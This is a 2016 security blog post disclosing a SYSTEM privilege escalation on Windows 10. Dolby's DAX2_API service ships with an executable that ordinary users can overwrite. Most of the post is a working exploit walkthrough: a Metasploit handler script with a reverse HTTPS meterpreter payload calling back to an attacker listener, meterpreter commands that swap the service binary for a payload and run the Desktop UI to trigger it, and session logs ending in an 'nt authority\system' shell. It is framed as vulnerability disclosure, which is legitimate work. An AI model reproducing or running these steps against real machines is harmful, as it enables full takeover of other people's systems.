home // code //

01/25/2016 Privilege Escalation (SYSTEM) via Dolby’s DAX2_API Service (Windows 10) Summary: Dolby’s DAX2 API ships with insecure file permissions giving us the ability to get SYSTEM on (in this case), Windows 10 on a Lenovo Thinkpad. From the service properties description: “Dolby DAX2 API Service is used by Dolby DAX2 applications to control Dolby Audio components in the system.” The Dolby DAX2 API ships with Lenovo’s and Windows 10 by default. Version: This particular scenario, assumes you either: 1. Already have a shell on a windows 10 machine, as a non-privileged user via a meterpreter payload, or 2. Have a login on a machine as a standard user account where you can execute your payload. We’ll go with the “Already have a shell…via meterpreter” scenario for the purpose of this disclosure considering physical access to a machine is usually game-over anyway. Some Details: The DolbyDAX2API.exe Service (DAX2_API) is loaded whenever the user runs the Desktop UI (DolbyDAX2DesktopUI.exe). We can see that the DAX2API service runs as SYSTEM. We can see that the actual service permissions are ok, but the permissions on the executable are pretty NOT OK. Service: Executable: The obvious issue is that users in the “Authenticated Users” group, have the ability to replace the “DolbyDAX2API.exe” file, which runs as SYSTEM, which is called by the Desktop UI (DolbyDAX2DesktopUI.exe). A minor set-back: While testing locally, and after replacing the service executable (DolbyDAX2API.exe) with our payload binary, and running the Desktop UI (DolbyDAX2DesktopUI.exe) to call it, I found that the payload would connect out to the listener, live, for about 5-10 seconds, then die, and the app would complain that some parts were missing: This meant that locally replacing the DolbyDAX2API.exe with our payload, and simply executing it, wouldn’t work for a persistent session considering the Dolby Desktop UI (DolbyDAX2DesktopUI.exe) process was now missing pieces required for it to stay stable; (the modified DolbyDAX2API.exe file). This would give me a really small time window in which to do anything from the listener-side once the payload connected back. I’d run a session -i (interact) command, have a few seconds, and the payload would die. Allow me to explain… We have an existing meterpreter session we got through some other exploit as a regular user (test), but we can’t get system through the somewhat usual mechanisms: Since we’re a regular user, with the ability to overwrite a file that runs as SYSTEM, the next step was to upload our payload to the Dolby API directory, overwrite the API service executable, and execute the Desktop GUI, essentially, now loading our payload as SYSTEM (under a new session): Upload payload to replace service binary: Execute the Desktop UI (notice the UI is in a different directory), essentially calling our payload as SYSTEM: Unfortunately, and as I mentioned previously, replacing the service binary with a custom file, and executing the Desktop UI file to call our payload as SYSTEM, we already know doesn’t work due to the fact that the payload dies since it’s an unknown file to the Desktop UI, and we end up with the “Missing components” error, and ultimately no shell (dead payload, timeout) : Dead Payload, our payload service has shut itself down: No good. We need a workaround for a payload that dies due to its parent not recognizing it. Fortunately, there’s a really convenient handler option to deal with this problem. Using the “InitialAutoRunScript” on the listener, I could, once the payload connected, automatically migrate the DolbyDAX2API.exe process to a more stable one with the migrate -f option. This worked like a charm. My listener resource script ended up looking something like: (handler.rc) use exploit/multi/handler set ExitOnSession false set LHOST x.x.x.210 set LPORT 443 set PAYLOAD windows/meterpreter/reverse_https set InitialAutoRunScript migrate -f exploit -j What we end up with, is when the second session (the SYSTEM) one is created by remotely calling the Desktop UI, the handler immediately, and automatically, migrates our payload DolbyDAX2API.exe process to a more stable one, launching our payload as SYSTEM, which is where we ultimately stay. So, starting again from our regular user (test) meterpreter shell, but this time with the InitialAutoRunScript option in our resource file set to automatically migrate the unstable DolbyDAX2API.exe process: msf exploit(handler)> sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 MACHINE1\test @ MACHINE1 x.x.x.210:443 -> x.x.x.2:50026 (x.x.x.181) Interact with the regular user session: msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : MACHINE1 OS : Windows 10 (Build 10586). Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 Upload our payload.exe to replace the service binary (DolbyDAX2API.exe) in C:\Program Files\Dolby\Dolby DAX2\DAX2_API: meterpreter > upload payload.exe "C:\\Program Files\\Dolby\\Dolby DAX2\\DAX2_API\\DolbyDAX2API.exe" [*] uploading : payload.exe -> C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [*] uploaded : payload.exe -> C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe meterpreter > Call the Desktop UI, which will load our new payload, and automatically migrate it to another (more stable) process thanks to the InitialAutoRunScript migrate -f option. (note, the desktop UI is in a different directory than the service executable): meterpreter > execute -f "C:\\Program Files\\Dolby\\Dolby DAX2\\DAX2_APP\\DolbyDAX2DesktopUI.exe" Process 6212 created. [*] x.x.x.2:50029 (UUID: 40d9e603d0260ceb/x86=1/windows=1/2016-01-26T03:28:54Z) Staging Native payload ... [*] Meterpreter session 2 opened (x.x.x.210:443 ->; x.x.x.2:50029) at 2016-01-26 03:28:54 +0000 [*] Session ID 2 (x.x.x.210:443 ->; x.x.x.2:50029) processing InitialAutoRunScript 'migrate -f' [*] Current server process: DolbyDAX2API.exe (4632) [*] Spawning notepad.exe process to migrate to [+] Migrating to 7044 [+] Successfully migrated to process Exit the current session: meterpreter > exit [*] Shutting down Meterpreter... [*] x.x.x.181 - Meterpreter session 1 closed. Reason: User exit Interact with your newly created, and (migrated) SYSTEM session: msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ MACHINE1 x.x.x.210:443 -> x.x.x.2:50029 (x.x.x.181) msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... Drop into a shell: meterpreter > shell Process 6184 created. Channel 1 created. Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. Confirm that you’re now SYSTEM: C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32> Have fun and exploit responsibly!